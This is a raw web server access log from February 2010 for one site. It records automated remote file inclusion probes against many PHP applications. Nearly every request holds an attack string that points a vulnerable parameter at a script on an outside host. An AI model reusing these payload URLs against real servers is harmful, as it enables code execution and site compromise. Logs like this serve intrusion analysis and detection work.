64.6.109.50 - - [20/Feb/2010:06:11:09 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:11:09 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:11:26 -0800] "GET /logs/access_100129.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:12:41 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:12:41 -0800] "GET /logs/access_100203.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:12:41 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:12:47 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:12:47 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:12:47 -0800] "GET /logs/access_100203.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:12:59 -0800] "GET /logs/access_100118.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:13:00 -0800] "GET /logs/access_100119.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:13:01 -0800] "GET /logs/access_100118.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:13:22 -0800] "GET /delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:13:22 -0800] "GET /logs/access_100205.log%20%20//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:13:22 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:13:32 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:13:32 -0800] "GET /logs/access_100208.log%20%20/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:13:32 -0800] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [20/Feb/2010:06:13:36 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:13:36 -0800] "GET /logs/access_100208.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:13:36 -0800] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:13:36 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:13:39 -0800] "GET /bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:13:39 -0800] "GET /logs//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:13:39 -0800] "GET /logs/access.log%20%20//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:06:13:48 -0800] "GET /logs/access_100213.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:06:13:48 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:06:13:48 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:13:51 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [20/Feb/2010:06:14:02 -0800] "GET /logs/access_100122.log/bbs/delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.112 - - [20/Feb/2010:06:14:02 -0800] "GET /bbs/delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.112 - - [20/Feb/2010:06:14:02 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:14:31 -0800] "GET /logs//index.php?sayfa=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:14:31 -0800] "GET /logs/access.log%20%20//index.php?sayfa=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:14:32 -0800] "GET /index.php?sayfa=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:14:33 -0800] "GET /logs/access_100117.log%20%20//index.php?sayfa=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:14:35 -0800] "GET /logs/access_100122.log%20%20/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:14:39 -0800] "GET /logs/access.log%20%20//index.php?sayfa=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:14:39 -0800] "GET /logs//index.php?sayfa=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:14:39 -0800] "GET /index.php?sayfa=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:14:41 -0800] "GET /logs/access_100117.log%20%20//index.php?sayfa=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:15:32 -0800] "GET /logs/access_100111.log%20%20/index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:15:32 -0800] "GET /logs/index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:15:32 -0800] "GET /index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:15:34 -0800] "GET /logs/access_100111.log%20%20/index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:15:34 -0800] "GET /logs/index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:15:34 -0800] "GET /logs/access_100111.log/index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:15:34 -0800] "GET /logs/index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:15:34 -0800] "GET /index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:15:34 -0800] "GET /index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [20/Feb/2010:06:15:35 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [20/Feb/2010:06:15:35 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [20/Feb/2010:06:15:35 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:15:39 -0800] "GET /logs/access_100111.log/index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:15:39 -0800] "GET /logs/index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:15:39 -0800] "GET /index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:15:43 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:15:43 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:15:43 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:15:48 -0800] "GET /bbs/download.head.skin.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:15:48 -0800] "GET /logs//bbs/download.head.skin.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [20/Feb/2010:06:15:58 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:16:03 -0800] "GET /logs/access_100205.log//bbs/download.head.skin.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:16:15 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:16:15 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:16:15 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [20/Feb/2010:06:16:36 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:06:16:54 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:06:16:54 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:06:16:54 -0800] "GET /logs/access_100213.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:17:02 -0800] "GET /appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:17:02 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:17:02 -0800] "GET /logs/access_100124.log%20%20//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:17:02 -0800] "GET /logs/access_100120.log%20%20//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:18:15 -0800] "GET /logs/access_100119.log%20%20//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:18:32 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://218.208.21.7/albums/album102/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:18:32 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://218.208.21.7/albums/album102/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:18:32 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://218.208.21.7/albums/album102/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:19:12 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:19:12 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:19:12 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:19:20 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:19:20 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:19:20 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [20/Feb/2010:06:19:33 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [20/Feb/2010:06:19:38 -0800] "GET /logs/access_100125.log//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:06:19:46 -0800] "GET /skin/zero_vote/error.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [20/Feb/2010:06:19:46 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:06:19:46 -0800] "GET /logs/access_100205.log%20%20//skin/zero_vote/error.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:06:19:46 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:20:14 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:20:14 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:20:14 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [20/Feb/2010:06:20:19 -0800] "GET /logs/access_100123.log%20/xmlrpc.php HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
221.143.46.124 - - [20/Feb/2010:06:20:19 -0800] "GET /xmlrpc.php HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:06:20:21 -0800] "GET /logs/access_100119.log%20%20//skin/zero_vote/error.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [20/Feb/2010:06:20:21 -0800] "GET /logs/xmlrpc.php HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:20:34 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://218.208.21.7/albums/album102/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:20:34 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://218.208.21.7/albums/album102/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:20:34 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://218.208.21.7/albums/album102/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:21:01 -0800] "GET /admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:21:01 -0800] "GET /logs//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:21:01 -0800] "GET /logs/access_100117.log%20%20//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:21:02 -0800] "GET /logs//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:21:02 -0800] "GET /logs/access_100117.log%20%20//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:21:02 -0800] "GET /admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:21:14 -0800] "GET /logs/access_100119.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
